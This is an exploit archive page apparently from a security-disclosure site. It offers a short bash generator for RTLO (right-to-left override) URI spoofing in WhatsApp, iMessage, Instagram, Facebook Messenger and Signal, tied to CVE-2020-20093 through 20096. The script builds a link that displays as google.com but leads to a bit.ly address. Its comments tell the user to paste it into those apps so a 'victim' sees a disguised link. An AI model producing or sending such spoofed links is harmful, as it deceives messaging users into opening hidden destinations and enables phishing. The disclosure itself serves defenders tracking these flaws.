Home[1] Files[2] News[3] Contact[4] Add New[5]
- RTLO Injection URI Spoofing[6]
- Authored by Sick Codes[7], zadewg[8]
-
RTLO injection URI spoofing generator for WhatsApp, iMessage, Instagram, and Facebook Messenger.
- advisories | CVE-2020-20093[9], CVE-2020-20094[10], CVE-2020-20095[11], CVE-2020-20096[12]
- MD5 |
6c508227541dc40dd1944f191db714a4 - Download[13] | Favorite[14] | View[15]
Change Mirror[16] Download[17]
# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version 2.19.80 and below
# Tested on: Whatsapp Android
# Version 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android 107.0.0.11
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096
#!/bin/bash
# Author: sickcodes
# Contact: https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright: sickcodes (C) 2022
# License: GPLv3+
# References: https://github.com/zadewg/RIUS
# https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
# https://sick.codes/sick-2022-40
APPEAR_AS='https://google.com'
DESTINATION='bit.ly/3ixIRwm'
printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n"
# copy paste into any of the above apps.
# victim will see a surreptitious link
# works on latest Signal (unpatched)
File Tags
- ActiveX[23] (932)
- Advisory[24] (77,016)
- Arbitrary[25] (15,012)
- BBS[26] (2,859)
- Bypass[27] (1,536)
- CGI[28] (1,010)
- Code Execution[29] (6,589)
- Conference[30] (668)
- Cracker[31] (797)
- CSRF[32] (3,261)
- DoS[33] (21,660)
- Encryption[34] (2,325)
- Exploit[35] (49,434)
- File Inclusion[36] (4,128)
- File Upload[37] (935)
- Firewall[38] (821)
- Info Disclosure[39] (2,538)
- Intrusion Detection[40] (847)
- Java[41] (2,762)
- JavaScript[42] (791)
- Kernel[43] (5,961)
- Local[44] (13,943)
- Magazine[45] (586)
- Overflow[46] (12,096)
- Perl[47] (1,410)
- PHP[48] (5,033)
- Proof of Concept[49] (2,275)
- Protocol[50] (3,268)
- Python[51] (1,379)
- Remote[52] (29,492)
- Root[53] (3,439)
- Ruby[54] (574)
- Scanner[55] (1,629)
- Security Tool[56] (7,657)
- Shell[57] (3,032)
- Shellcode[58] (1,200)
- Sniffer[59] (879)
- Spoof[60] (2,075)
- SQL Injection[61] (15,937)
- TCP[62] (2,348)
- Trojan[63] (668)
- UDP[64] (866)
- Virus[65] (657)
- Vulnerability[66] (30,291)
- Web[67] (8,926)
- Whitepaper[68] (3,705)
- x86[69] (942)
- XSS[70] (17,254)
- Other[71]
File Archives
- March 2022[72]
- February 2022[73]
- January 2022[74]
- December 2021[75]
- November 2021[76]
- October 2021[77]
- September 2021[78]
- August 2021[79]
- July 2021[80]
- June 2021[81]
- May 2021[82]
- April 2021[83]
- Older[84]
Systems
- AIX[85] (424)
- Apple[86] (1,873)
- BSD[87] (368)
- CentOS[88] (55)
- Cisco[89] (1,911)
- Debian[90] (5,947)
- Fedora[91] (1,690)
- FreeBSD[92] (1,241)
- Gentoo[93] (4,152)
- HPUX[94] (876)
- iOS[95] (315)
- iPhone[96] (108)
- IRIX[97] (220)
- Juniper[98] (67)
- Linux[99] (41,714)
- Mac OS X[100] (683)
- Mandriva[101] (3,105)
- NetBSD[102] (255)
- OpenBSD[103] (477)
- RedHat[104] (11,220)
- Slackware[105] (941)
- Solaris[106] (1,605)
- SUSE[107] (1,444)
- Ubuntu[108] (7,684)
- UNIX[109] (9,038)
- UnixWare[110] (183)
- Windows[111] (6,312)
- Other[112]
- Services
- Security Services[123]
- Hosting By
- Rokasec[124]


